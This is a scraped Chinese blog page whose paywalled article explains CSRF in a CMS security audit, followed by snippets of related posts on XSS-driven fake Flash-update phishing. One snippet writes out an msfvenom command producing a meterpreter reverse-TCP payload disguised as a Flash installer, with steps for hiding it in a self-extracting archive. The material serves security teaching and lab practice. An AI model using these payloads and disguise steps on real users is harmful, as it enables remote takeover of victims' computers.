实战审计cms之CSRF——CSRF+Xss+Flash钓鱼

最新推荐文章于 2025-10-25 11:37:40 发布
原创 最新推荐文章于 2025-10-25 11:37:40 发布 · 669 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入浅出地介绍了CSRF(跨站请求伪造)的概念,通过本地靶场演示了CSRF的利用过程,展示了如何利用CSRF漏洞在CMS中添加友链。同时,文章还提及了XSS和Flash钓鱼的结合,强调了防范措施的重要性,如二次校验、校验token等。 
更多渗透技能  欢迎搜索公众号:白帽子左一

作者:掌控安全-holic

前言

CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf

然后cnvd跟我说不收csrf和后台存储xss,自此后台我从不找xsscsrf

但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk

图片

0x01 CSRF介绍

CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造

CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。

1).CSRF是利用了系统对页面浏览器的信任

2).XSS则利用了系统对用户的信任。

原理:

攻击者盗用了你的身份,以你的名义发送恶意请求

CSRF能够做的事情有:

以你的名义发送邮件、发消息、盗取你的账号,甚至于购买商品,虚拟货币转账

0x02.本地靶场演示csrf

这个cms是我找的,提交cnvd不收,我就拿出来讲QAQ

cms下载地址:http://down.chinaz.c

最低0.47元/天 解锁文章
xxs-flash-钓鱼
qq_38618396的博客
12-27 871
0x00 准备 1、源码:https://github.com/r00tSe7en/Fake-flash.cn 2、域名:一个和flash相近的域名和一台服务器 3、木马:cobalstrike生成木马 4、其他:flash安装包 0x01 实际操作 搭建环境 第一步:下载源代码,直接在使用phpstudy搭建一个网站: 第二步:启动cs,制作木马 使用cs生成一个木马 第三步:下载flash安装程序 在这里插入图片描述 ...
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 3246
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
CSRF钓鱼链接攻击
球球的博客
03-20 6174
CSRF发生的原理和过程,验证Referer这种不靠谱的防御即绕过
XSS-Flash攻击钓⻥
2401_85783544的博客
07-23 470
进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe。点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。
Xss——Flash钓鱼
weixin_56291508的博客
04-22 939
Xss——Flash钓鱼
PHP代码审计基础:CSRF漏洞
1匹黑马
11-28 540
文章目录CSRF漏洞危害挖掘思路环境搭建实施攻击攻击条件修复方案 CSRF CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,Use
小白也能看懂的JavaScript安全漏洞——XSS,CSRF等攻击的全面解析
最新发布
zhengfei611的博客
10-25 808
JavaScript 是一种高级的、解释型的编程语言");// 输出到控制台- 轻量级、解释型语言- 支持面向对象、函数式编程- 主要用于网页交互- 现在也可用于服务端(Node.js)
WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOM&BEEF-XSS
weixin_45534587的博客
01-12 1399
XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 1073
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
Django之CSRF跨站请求伪造(老掉牙的钓鱼网站模拟)
ama7790的博客
04-23 261
首先这是一个测试的代码 请先在setting页面进行下面操作 注释完成后,开始模拟钓鱼网站的跨站请求伪造操作: 前端代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</tit...
CSRF跨站点伪造请求攻击之——CSRF钓鱼添加管理员账号及安全防范
温柔小薛的博客
04-11 842
CSRF钓鱼添加管理员账号及安全防范 本地网络设备 CSRF 攻击 一般情况下,外网不可以访问,交换机等硬件也是,如果想访问内网设备,应该怎么办呢,注意,内网设备很多是默认密码的 首先,模拟正常用户身份登录,进入到路由器中开启web管理端口,再用burp抓包,抓取得到地址 <img src=http://192.168.1.1/userRpm/ManageControlRpm.htm?po...
flash csrf
weixin_34250709的博客
12-05 133
crossdomain.xml文件配置好<object><embed>中的allowNetworking参数中有allow,internal,none·all —— 允许所有的网络 API·internal —— 不能调用浏览器导航或浏览器交互 API。例如 getURL(flash8) 和 navigateToURL 等。仍然可以向外发请求和加载内容...
Flash CSRF
weixin_34342905的博客
03-08 230
_Dy · 2013/10/28 11:29目录0x00 Flash CSRF 名词解释 0x01 Flash CSRF形成的原因 0x02 Flash CSRF可以干些什么 0x03 Flash CSRF如何利用 0x04 Flash CSRF怎么防御 复制代码0x00 Flash CSRF名词解释CSRF(Cross-site request forgery跨站请求伪造,是一种对网站的恶意利用...
PHP代码审计 ------------CSRF漏洞
qq_62344745的博客
04-17 315
CSRF( Cross-site request forgery)跨站请求伪造,也有人写出XSRF。黑客伪造用户木匾用户的HTTP请求。然后将这个HTTP请求发送给存在CSRF的网站,有CSRF的网站执行了伪造的HTTP请求,就引发了跨站请求伪造相对来说,比xss更具有危害性,
PHP代码审计 ----- CSRF漏洞
qq_62344745的博客
05-05 235
验证有没有token值,有没有http头的referer 的。
xss——flash钓鱼 (kali MSF捆绑钓鱼)超详细!小白也可以!
qq_48368964的博客
07-23 2343
kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)
csrf漏洞php代码审计1
m0_55772907的博客
04-30 342
(1)原理 当我们打开或登录某个网站,浏览器与网站所存放的服务器会产生一个会话,之后一段时间,所有通过这个认证会话的请求,都会被视为可信的动作,比如此时你正登录网上银行,正在转账,此时攻击者构造恶意转账代码,当你不小心点击它时,就会完成相应的转账操作,因为此时浏览器认为这是可信的正常操作。 (2)分类dvwa low 我们可以看到low难度的源代码中,并没有添加token,且修改密码是通过get请求发送,该修改请求可以构造 。 medium 前端代码还是一样的,没有添加token,分析.
XSS-Flash攻击钓鱼
qq_66105152的博客
07-26 329
(1)MSF⽣成Payload,执行下面代码后会生成一个shell.exe文件。(3)将shell.exe拖到www目录下并修改为flash.exe。5.打开pikachu存储型xss下载flash.exe并运行。6.虚拟机得到主机控制权。
Web安全实验:跨站攻击(XSS+CSRF)原理与实战
实验内容包括使用Kali Linux工具对DVWA的XSSCSRF漏洞进行实战操作,同时要求理解各种级别的攻击以及修复策略。实验报告应详细记录整个过程,包括攻击步骤、观察结果和修复建议。 在进行此类实验时,重要的是要...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值